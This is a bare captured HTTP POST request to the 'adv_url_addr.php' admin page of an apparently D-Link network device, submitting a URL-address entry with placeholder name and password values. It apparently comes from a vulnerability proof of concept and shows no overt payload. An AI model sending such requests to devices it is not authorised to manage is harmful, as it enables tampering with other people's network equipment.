POST /adv_url_addr.php HTTP/1.1
Host: 192.168.33.132:33160
Content-Length: 185
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.33.132:33160
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.33.132:33160/adv_url_addr.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: dlink_uid=tourhzzuvv
Connection: close

ACTION_POST=adv_url_addr&which_delete=&which_edit=&f_url=1&f_auth=1&action=add&url_enable=1&url_addr=1.1.1.1&auth_enable=1&r_name=1A2B3C4D5E6F7890&r_password=1234567890&account_status=1